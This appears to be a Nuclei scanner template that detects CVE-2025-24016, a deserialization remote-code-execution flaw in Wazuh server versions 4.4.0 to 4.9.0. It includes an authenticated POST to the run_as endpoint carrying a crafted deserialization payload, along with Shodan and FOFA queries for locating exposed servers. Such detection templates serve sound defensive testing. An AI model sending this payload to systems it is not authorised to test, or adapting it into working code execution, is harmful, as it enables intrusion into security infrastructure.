id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.93512
    epss-percentile: 0.99833
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100a83fada9883a8ffe2f3b952449545769038303fbd601aa1623b9d99c25104376022100e8886f98ba89a7379dfef07a7fbcb854eccacddb7cf0f2948b926de6d632e9d0:922c64590222798bb761d5b6d8e72950